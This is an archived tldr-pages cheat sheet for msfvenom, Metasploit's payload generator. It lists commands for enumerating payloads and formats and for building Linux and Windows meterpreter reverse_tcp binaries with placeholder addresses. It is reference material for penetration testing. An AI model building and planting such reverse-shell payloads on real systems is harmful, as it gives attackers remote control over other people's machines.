💾 Archived View for freeshell.de › tldr › msfvenom.gmi captured on 2024-02-05 at 11:37:27. Gemini links have been rewritten to link to archived content

View Raw

More Information

⬅️ Previous capture (2022-04-28)

-=-=-=-=-=-=-

msfvenom

Manually generate payloads for metasploit.

More information.

msfvenom -l payloads
msfvenom -l formats
msfvenom -p {payload} --list-options
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={local_ip} LPORT={local_port} -f elf > {path/to/binary}
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={local_ip} LPORT={local_port} -f exe > {path/to/binary.exe}
Copyright © 2014—present the tldr-pages team and contributors.
This work is licensed under the Creative Commons Attribution 4.0 International License (CC-BY).

CC-BY